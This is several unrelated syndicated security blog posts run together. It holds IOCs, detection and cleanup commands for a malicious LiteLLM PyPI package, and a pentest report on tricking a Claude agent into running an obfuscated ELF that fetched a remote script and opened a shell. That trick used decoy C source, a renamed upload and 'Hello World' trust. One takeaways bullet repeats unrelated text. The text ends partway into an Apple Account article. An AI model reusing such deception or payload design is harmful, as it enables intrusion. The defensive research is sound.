<td><code>hxxp://169.254.169.254/latest/meta-data/iam/security-credentials/</code></td> <td>AWS IMDS credential theft</td> </tr> </tbody> </table> </figure><h3 class="wp-block-heading" id="filesystem"><strong>Filesystem</strong></h3><figure class="wp-block-table"> <table class="has-fixed-layout"> <thead> <tr> <th><strong>Path</strong></th> <th><strong>Description</strong></th> </tr> </thead> <tbody> <tr> <td><code>~/.config/sysmon/sysmon.py</code></td> <td>Persistent C2 backdoor</td> </tr> <tr> <td><code>~/.config/systemd/user/sysmon.service</code></td> <td>Systemd persistence unit</td> </tr> <tr> <td><code>/tmp/pglog</code></td> <td>Downloaded payload binary</td> </tr> <tr> <td><code>/tmp/.pg_state</code></td> <td>C2 state tracking</td> </tr> <tr> <td><code>litellm_init.pth</code> in site-packages</td> <td>Malicious <code>.pth</code> loader (v1.82.8)</td> </tr> </tbody> </table> </figure><h3 class="wp-block-heading" id="kubernetes"><strong>Kubernetes</strong></h3><ul class="wp-block-list"> <li>Pods named <code>node-setup-*</code> in namespace <code>kube-system</code></li> <li>Created with <code>hostPID: true, hostNetwork: true, privileged: true</code></li> </ul><h3 class="wp-block-heading" id="cryptographic"><strong>Cryptographic</strong></h3><ul class="wp-block-list"> <li>RSA-2048 attacker public key fingerprint (embedded in payload): <code>vahaZDo8mucujrT15ry+08qNLwm3kxzFSMj84M16lmIEeQA8u1X8DGK0...</code></li> </ul><h2 class="wp-block-heading" id="detection"><strong>Detection</strong></h2><h3 class="wp-block-heading" id="check-for-active-infection">Check for active infection</h3><pre class="wp-block-code"><code># Check for backdoor service systemctl --user status sysmon.service # Check for backdoor script and C2 artifacts ls -la ~/.config/sysmon/sysmon.py ls -la ~/.config/systemd/user/sysmon.service ls -la /tmp/pglog /tmp/.pg_state # Check for malicious .pth in all Python environments find $(python3 -c "import site; print('\n'.join(site.getsitepackages()))") \ -name "*.pth" | xargs grep -l "subprocess.Popen" 2&gt;/dev/null # Check for K8s escape pods kubectl get pods -n kube-system | grep node-setup</code></pre><p>_{<strong>Figure 5:</strong> Detection commands for the sysmon backdoor and associated artifacts}</p><h3 class="wp-block-heading" id="remove-the-backdoor"><strong>Remove the backdoor</strong></h3><pre class="wp-block-code"><code>systemctl --user stop sysmon.service systemctl --user disable sysmon.service rm -f ~/.config/systemd/user/sysmon.service rm -rf ~/.config/sysmon/ rm -f /tmp/pglog /tmp/.pg_state systemctl --user daemon-reload # Remove malicious .pth file pip uninstall litellm # also manually verify .pth is gone from site-packages</code></pre><p>_{<strong>Figure 6:</strong> Remediation steps for infected hosts}</p><h3 class="wp-block-heading" id="rotate-credentials-immediately"><strong>Rotate credentials immediately</strong></h3><p>Any machine that had Python start with <code>litellm</code> 1.82.7 or 1.82.8 installed must be treated as fully compromised. Rotate: AWS IAM keys, SSH keys, npm tokens, database passwords, Kubernetes service account tokens, Docker registry credentials, and any cloud provider credentials present in environment variables or config files.</p><h2 class="wp-block-heading" id="conclusion"><strong>Conclusion</strong></h2><p>The LiteLLM attack is the third major wave in TeamPCP’s March 2026 campaign. Trivy provided initial access. CanisterWorm spread through the npm ecosystem. Now a malicious PyPI package reaches a different but overlapping audience: AI and ML developers who use LiteLLM to integrate language models into applications. These pipelines routinely have access to cloud credentials, model API keys, and production infrastructure.</p><p>The upgrade from npm to PyPI, and from module-level hooks to <code>.pth</code> auto-execution, shows an actor that is actively evolving their delivery mechanisms across ecosystems while keeping the same core payload and infrastructure.<br>PyPI has quarantined the affected versions. If you are running LiteLLM, verify your installed version (<code>pip show litellm</code>) and upgrade to a clean release. If you were running 1.82.7 or 1.82.8 at any point, assume compromise and rotate all credentials.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/teampcp-supply-chain-attack-part-2-litellm-pypi-credential-stealer/" data-a2a-title="TeamPCP Supply Chain Attack Part 2: LiteLLM PyPI Credential Stealer"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fteampcp-supply-chain-attack-part-2-litellm-pypi-credential-stealer%2F&amp;linkname=TeamPCP%20Supply%20Chain%20Attack%20Part%202%3A%20LiteLLM%20PyPI%20Credential%20Stealer" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fteampcp-supply-chain-attack-part-2-litellm-pypi-credential-stealer%2F&amp;linkname=TeamPCP%20Supply%20Chain%20Attack%20Part%202%3A%20LiteLLM%20PyPI%20Credential%20Stealer" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fteampcp-supply-chain-attack-part-2-litellm-pypi-credential-stealer%2F&amp;linkname=TeamPCP%20Supply%20Chain%20Attack%20Part%202%3A%20LiteLLM%20PyPI%20Credential%20Stealer" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fteampcp-supply-chain-attack-part-2-litellm-pypi-credential-stealer%2F&amp;linkname=TeamPCP%20Supply%20Chain%20Attack%20Part%202%3A%20LiteLLM%20PyPI%20Credential%20Stealer" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fteampcp-supply-chain-attack-part-2-litellm-pypi-credential-stealer%2F&amp;linkname=TeamPCP%20Supply%20Chain%20Attack%20Part%202%3A%20LiteLLM%20PyPI%20Credential%20Stealer" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.mend.io">Mend</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Tom Abai">Tom Abai</a>. Read the original post at: <a href="https://www.mend.io/blog/teampcp-supply-chain-series-part-2/">https://www.mend.io/blog/teampcp-supply-chain-series-part-2/</a> </p>

<div data-elementor-type="wp-post" data-elementor-id="10919" class="elementor elementor-10919" data-elementor-post-type="post"> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-c6eba17 e-con-full e-flex e-con e-parent" data-id="c6eba17" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-737af17 elementor-widget elementor-widget-text-editor" data-id="737af17" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>During a recent penetration test, we came across an AI-powered desktop application that acted as a bridge between Claude (Opus 4.5) and a third-party asset management platform. The idea is simple: instead of clicking through dashboards and making API calls, users just ask the agent to do it for them. “How many open tickets do we have?” “Update this record.” That kind of thing.</p> <p>The agent ran inside a sandboxed environment, and the client was confident in their controls. Rigid system prompts (even prepended to each message), deterministic hooks in place to prevent accidental disclosure, and so on. To their credit, those controls held up; we just found another way to do what we wanted.</p> <h3><strong>Automating the Recon</strong></h3> <p><a id="_Hlk224913142"></a>Manual LLM testing is a drag. You’re sitting there typing prompts one at a time, waiting for responses, trying to keep track of what worked and what didn’t. It’s tedious, and it doesn’t scale.</p> <p>Our go-to approach is to get another LLM to do the dirty work. For this engagement, the target was accessible via an Electron desktop application, meaning you could launch it in debug mode and access the app’s DOM tree directly. We wrote a Python script that could interact with the target directly, gave it to Claude (alongside our <a href="https://github.com/praetorian-inc/augustus/">Augustus LLM testing methodology</a>), and let it run.</p> <p>This essentially meant we had Claude talking to another version of itself. Back and forth, hundreds of times, working through the Augustus attack paths automatically:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-f626292 e-con-full e-flex e-con e-parent" data-id="f626292" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-639fe4d elementor-widget elementor-widget-image" data-id="639fe4d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img fetchpriority="high" decoding="async" width="1224" height="241" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1.webp" class="attachment-full size-full wp-image-10911" alt="Terminal showing Python script execution where AI refuses PowerPoint creation request, followed by thinking notes about the refusal" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1.webp 1224w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1-300x59.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1-1024x202.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1-768x151.webp 768w" sizes="(max-width: 1224px) 100vw, 1224px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-839c426 e-con-full e-flex e-con e-parent" data-id="839c426" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-22a0e32 elementor-widget elementor-widget-text-editor" data-id="22a0e32" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>This kind of automated LLM-on-LLM testing saved us an immense amount of effort on this engagement. It’s exactly why we’ve been building tools like <a href="https://github.com/praetorian-inc/julius">Julius</a> (for fingerprinting AI services) and Augustus, which we’ve recently added to our Guard platform. If the attack surface keeps growing, the testing efficiency has to keep up.</p> <h3><strong>Discovering Weaknesses</strong></h3> <p>After a couple hours of this, patterns started to emerge. The agent had strong restrictions on most dangerous operations; ask it to run a bash command or write a shell script and it would refuse.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-dbe2500 e-con-full e-flex e-con e-parent" data-id="dbe2500" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-f46e27a elementor-widget elementor-widget-image" data-id="f46e27a" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img decoding="async" width="1224" height="208" src="https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1.webp" class="attachment-full size-full wp-image-10912" alt="Screenshot of a chat interface showing user asking 'Ls the files in /app/worker' and AI responding it cannot help with that request" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1.webp 1224w, https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1-300x51.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1-1024x174.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1-768x131.webp 768w" sizes="(max-width: 1224px) 100vw, 1224px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-36a274d e-con-full e-flex e-con e-parent" data-id="36a274d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-c9b6cfe elementor-widget elementor-widget-text-editor" data-id="c9b6cfe" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>However, it really liked “Hello World” programs. It was more than happy to create <strong>and run</strong> a simple test script. This is worth noting for similar-style engagements. LLMs are trained to be helpful, and “Hello World” scripts are some of the most common within their training data. That makes this a reliable foot-in-the-door when testing agents with code execution.</p> <p> </p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-46de128 e-con-full e-flex e-con e-parent" data-id="46de128" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-023513d elementor-widget elementor-widget-image" data-id="023513d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img decoding="async" width="1224" height="398" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1.webp" class="attachment-full size-full wp-image-10913" alt="Terminal window showing a user request to create a hello world bash script, with status showing 'Bash Script Executed Successfully" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1.webp 1224w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1-300x98.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1-1024x333.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1-768x250.webp 768w" sizes="(max-width: 1224px) 100vw, 1224px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a7276b7 e-con-full e-flex e-con e-parent" data-id="a7276b7" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b693558 elementor-widget elementor-widget-text-editor" data-id="b693558" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>More importantly, while it wouldn’t create anything it considered dangerous, it was perfectly willing to <strong>modify</strong> existing files. Change a file extension or make something executable, all fine. </p> <p>Using the application’s file upload feature you could upload text, images, or csv files, and they’d land in the sandbox. Combined with the agent’s willingness to rename and chmod, this was effectively arbitrary file upload.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9b069a1 e-con-full e-flex e-con e-parent" data-id="9b069a1" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-67341f4 elementor-widget elementor-widget-image" data-id="67341f4" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="1414" height="277" src="https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1.webp" class="attachment-full size-full wp-image-10914" alt="Two chat messages in dark interface. First asks to fix filetype of env_check2.txt and move to cwd. Second confirms task." srcset="https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1.webp 1414w, https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1-300x59.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1-1024x201.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1-768x150.webp 768w" sizes="auto, (max-width: 1414px) 100vw, 1414px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-22eaa52 e-con-full e-flex e-con e-parent" data-id="22eaa52" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-038e023 elementor-widget elementor-widget-text-editor" data-id="038e023" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <h3><strong>Hitting a Wall</strong></h3> <p>Getting code execution should have been straightforward from there – just upload a script and have the agent execute it – but it wasn’t. Opus 4.5 is genuinely good at catching malicious payloads, and it blocked everything we threw at it:</p> <ul> <li>Obfuscated/encoded scripts would get decoded and blocked (or rejected outright citing an inability to verify safety).</li> <li>A wrapper script that runs everything in a directory failed, as it understood the context and inspected each script individually first.</li> <li>Swapping a benign script for a malicious one after building trust didn’t work because it re-read the file before every execution (and the architecture prevented races).</li> </ul> <p>The model had a clear policy: if it couldn’t understand what something did, it wouldn’t run it. And if it could understand it and it looked dangerous, it wouldn’t run it either. We needed something that Opus 4.5 <strong>thought</strong> it understood and <strong>believed</strong> was harmless.</p> <h3><strong>The Trick</strong></h3> <p>The answer came from the “Hello World” observation from earlier. The agent trusted simple programs, and it trusted its own ability to read C code and verify what a binary does. But what if the source code doesn’t actually match the binary?</p> <p>We created two separate programs. The first was legitimate C source code for a hello world program that also calls system(“date”), giving a plausible reason for a system() call to exist in the binary.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-e2eaa69 e-con-full e-flex e-con e-parent" data-id="e2eaa69" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-147333b elementor-widget elementor-widget-image" data-id="147333b" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="1151" height="387" src="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1.webp" class="attachment-full size-full wp-image-10915" alt="C code editor showing hello_world.c file with main function containing printf Hello World, system date command, and return 0" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1.webp 1151w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1-300x101.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1-1024x344.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1-768x258.webp 768w" sizes="auto, (max-width: 1151px) 100vw, 1151px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-cc9dabb e-con-full e-flex e-con e-parent" data-id="cc9dabb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-198d3a9 elementor-widget elementor-widget-text-editor" data-id="198d3a9" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The second was the actual payload binary. A statically compiled ELF that downloads and executes a shell script from our server, while also running the same commands as the decoy. We statically compiled it so the binary would be large enough (~600KB) that Claude couldn’t easily analyze it. We also performed a basic XOR against the payload to make it harder to decode.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9f96d11 e-con-full e-flex e-con e-parent" data-id="9f96d11" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-a5c68bb elementor-widget elementor-widget-image" data-id="a5c68bb" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="1638" height="646" src="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1.webp" class="attachment-full size-full wp-image-10916" alt="C code editor showing malicious program with encoded payload array, XOR decoding loop, and system() call to execute decoded commands" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1.webp 1638w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-300x118.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-1024x404.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-768x303.webp 768w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-1536x606.webp 1536w" sizes="auto, (max-width: 1638px) 100vw, 1638px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-ed08f7b e-con-full e-flex e-con e-parent" data-id="ed08f7b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-bcf88af elementor-widget elementor-widget-image" data-id="bcf88af" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1000" height="232" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1.webp" class="attachment-full size-full wp-image-10917" alt="Terminal output showing two copied files: hello_world ELF 64-bit executable with magic bytes 7f 45 4c 46, and hello_world.c C source file" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1.webp 1000w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1-300x70.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1-768x178.webp 768w" sizes="auto, (max-width: 1000px) 100vw, 1000px"><figcaption class="widget-image-caption wp-caption-text">Terminal display confirms successful compilation of a C program into an executable ELF binary, ready for analysis or execution.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-7557e01 e-con-full e-flex e-con e-parent" data-id="7557e01" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-abfa907 elementor-widget elementor-widget-image" data-id="abfa907" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1216" height="158" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1.webp" class="attachment-full size-full wp-image-10918" alt="Terminal screenshot showing 'nc -l 13339' command and 'id' command output displaying uid=1001(appuser) gid=1001(appuser) groups=1001(appuser)" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1.webp 1216w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1-300x39.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1-1024x133.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1-768x100.webp 768w" sizes="auto, (max-width: 1216px) 100vw, 1216px"><figcaption class="widget-image-caption wp-caption-text">Command line interface showing a netcat listener on port 13339 and the id command revealing the current user as ‘appuser’ with UID 1001.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-3c1a07a e-con-full e-flex e-con e-parent" data-id="3c1a07a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-3aa94a7 elementor-widget elementor-widget-text-editor" data-id="3aa94a7" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The sandbox contained the application’s entire business logic. System prompts, MCP tool definitions, the Dockerfile used to build the environment, and the Node.js server running all the integrations. In short: the crown jewels.</p> <h3><strong>Takeaways</strong></h3> <p>If you’re building or deploying AI agents with code execution capabilities, don’t rely on the model’s judgment as a security control. It can be fooled. Here’s what we recommended to the client:</p> <ul> <li><strong>Restrict executable operations at the OS level:</strong> The sandbox should prevent the agent from setting the execute bit on user-uploaded files or running binaries that weren’t pre-installed in the image.</li> <li><strong>Validate uploaded files by content, not just extension:</strong> Check magic bytes. An ELF binary with a .txt extension should be rejected. Content-type validation should persist through file rename operations.</li> <li><strong>Add tool-level guardrails for dangerous operations:</strong> The first was legitimate C source code for a hello world program. It also calls system(“date”), giving a plausible reason for a system() call to exist in the binary.</li> <li><strong>Lock down network egress:</strong> The sandbox didn’t need total outbound internet connectivity, as it only really interfaced with a couple external APIs. Outbound firewalling, while not a primary control, can greatly hinder post-exploitation activity.</li> </ul> <p>Findings and recommendations like these are part of what we do continuously through our <a href="https://www.praetorian.com/guard/">Guard platform</a>. Guard continuously monitors and tests internet-facing and internally-deployed infrastructure, including AI agents and LLM-powered applications, as they evolve and change over time. Got a new agentic deployment, model version, or MCP tool? Guard picks it up and our operators test it, identifying vulnerabilities just like this.</p> <h2>FAQ</h2> <h3>Why did static compilation matter?</h3> <p>A dynamically linked binary is small enough that the LLM could potentially inspect the raw bytes and identify suspicious library calls like network functions. A statically compiled binary is hundreds of kilobytes of noise, making it effectively opaque to the model.</p> <h3>What is Augustus?</h3> <p>Augustus is Praetorian’s Go-based LLM vulnerability scanner. It tests large language models against a wide range of adversarial attacks and jailbreaks. In this case, we used its methodology to automate the discovery of behavioral weaknesses in the target agent.</p> <h3>Did this affect real customer data?</h3> <p>This was conducted during an authorized penetration test. The sandbox environment was isolated, and we did not access or exfiltrate any customer data. The client has since remediated the vulnerability.</p> <h3>Could this work against other LLM agents?</h3> <p>The core technique exploits a general weakness: LLMs are trained to assist, and “Hello World” scripts are among the most common things they’re asked to produce. Any agent with code execution that treats “simple test script” as a safe category is potentially giving attackers a method of initial access. On top of that, the faked source code trick exploits another general weakness: LLMs will often trust contextual information over direct inspection when the direct inspection is too difficult.</p> </div> </div> </div><p>The post <a href="https://www.praetorian.com/blog/which-came-first-system-prompt-or-rce/">Which Came First: The System Prompt, or the RCE?</a> appeared first on <a href="https://www.praetorian.com/">Praetorian</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/which-came-first-the-system-prompt-or-the-rce/" data-a2a-title="Which Came First: The System Prompt, or the RCE?"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhich-came-first-the-system-prompt-or-the-rce%2F&amp;linkname=Which%20Came%20First%3A%20The%20System%20Prompt%2C%20or%20the%20RCE%3F" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhich-came-first-the-system-prompt-or-the-rce%2F&amp;linkname=Which%20Came%20First%3A%20The%20System%20Prompt%2C%20or%20the%20RCE%3F" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhich-came-first-the-system-prompt-or-the-rce%2F&amp;linkname=Which%20Came%20First%3A%20The%20System%20Prompt%2C%20or%20the%20RCE%3F" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhich-came-first-the-system-prompt-or-the-rce%2F&amp;linkname=Which%20Came%20First%3A%20The%20System%20Prompt%2C%20or%20the%20RCE%3F" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhich-came-first-the-system-prompt-or-the-rce%2F&amp;linkname=Which%20Came%20First%3A%20The%20System%20Prompt%2C%20or%20the%20RCE%3F" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.praetorian.com/blog/">Offensive Security Blog: Latest Trends in Hacking | Praetorian</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by n8n-publisher">n8n-publisher</a>. Read the original post at: <a href="https://www.praetorian.com/blog/which-came-first-system-prompt-or-rce/">https://www.praetorian.com/blog/which-came-first-system-prompt-or-rce/</a> </p>

<h2>The big shift from Apple ID to Apple Account</h2><p>Ever wonder why that little button on your screen suddenly changed its name? It’s not just some marketing guy at apple bored on a Tuesday; it’s a massive shift in how we handle identity for saas.</p><p>Moving from "Apple ID" to <strong>Apple Account</strong> is about killing off legacy baggage. The old name felt like a username for a store, but the new one is a full-on identity layer that works the same whether you're on an iPad or a browser. Apple is rebranding the whole system to be more of a "digital passport" than just a login for buying apps.</p><ul> <li><strong>Unified Trust</strong>: When users see "Apple Account," they associate it with their entire digital life. This boosts "login button" conversion in industries like <strong>finances</strong> where trust is everything.</li> <li><strong>Ecosystem Consistency</strong>: It creates a seamless flow across retail apps and healthcare portals. If a patient logs into a portal using their apple account, the familiarity reduces "drop-off" rates.</li> <li><strong>Brand Maturity</strong>: It signals that Apple is serious about being a primary identity provider, competing directly with google and microsoft.</li> </ul><p>Under the hood, this isn't magic. It’s built on <strong>oauth 2.0</strong> and <strong>openid connect</strong>. One of the coolest features for developers is the <strong>private email relay</strong>, which lets users hide their real address while still letting you send them emails.</p><p><strong>The Flow of Identity Trust</strong><br> <img decoding="async" src="https://cdn.pseo.one/6853a4a8a2796a91bb994a76/68bc6a97410e253e325f40af/what-does-it-mean-to-sign-in-with-an-apple-account/mermaid-diagram-1.svg" alt="The Flow of Identity Trust"></p><p>According to <a href="https://developer.apple.com/sign-in-with-apple/">Apple's official documentation</a>, this system uses on-device biometrics like <strong>touch id</strong> and <strong>face id</strong>, so users don't even have to remember a password. This is huge for security professionals trying to kill off phishing.</p><p>Honestly, it’s a relief to see them simplify this. Next, let’s look at how this shift impacts the messy world of corporate offices.</p><h2>Identity management in the enterprise world</h2><p>Most employees are already carrying an iphone in their pocket, and honestly, they're tired of juggling fifteen different work passwords just to check a simple spreadsheet. It's no wonder they keep trying to use their personal accounts for everything—it's just easier.</p><p>The line between "work life" and "home life" is basically gone when it comes to hardware. People trust their face id more than they trust a clunky corporate vpn. When you let someone sign in with their apple account, you aren't just giving them a button; you're giving them a shortcut that they actually understand.</p><p>In healthcare, for instance, a nurse needs to update a patient chart fast without fighting a login screen. In retail, a floor manager using an ipad wants to check inventory between helping customers. If the login is slow, they'll find a workaround—and usually, those workarounds are a security nightmare.</p><p>But here is the catch for the it guys. Managing a bunch of individual apple accounts in a b2b environment is like herding cats. You've got directory synchronization issues and the "orphaned account" problem where an employee leaves but still has access to the saas app because their personal account wasn't unlinked. </p><ul> <li><strong>Directory Mess</strong>: Most enterprise apps rely on active directory or okta, which don't always play nice with consumer-facing identity providers.</li> <li><strong>Security Gaps</strong>: If a user bypasses the official sso to use their apple account, you lose visibility into who is doing 